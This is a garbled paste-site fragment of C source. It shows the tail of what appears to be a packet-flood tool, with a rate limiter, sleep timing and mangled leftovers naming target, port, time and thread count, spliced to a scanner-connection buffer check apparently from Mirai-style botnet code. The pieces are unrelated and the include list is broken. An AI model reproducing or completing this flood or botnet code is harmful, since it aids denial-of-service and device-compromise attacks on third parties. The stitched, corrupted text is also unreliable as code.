- }
- } else {
- limiter++;
- if(sleeptime > 25)
- {
- sleeptime-=25;
- } else {
- sleeptime = 0;
- }
- }
- pps = 0;
- }
- return 0;
- }</num_threads;i++){<br></time></pps></number></port></target>____</time.h></netinet></netinet></sys></string.h></stdlib.h></stdio.h></unistd.h></pthread.h>
- static BOOL can_consume(struct scanner_connection *conn, uint8_t *ptr, int amount)
- {
- uint8_t *end = conn->rdbuf + conn->rdbuf_pos;
- return ptr + amount < end;
- }
- #endif
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement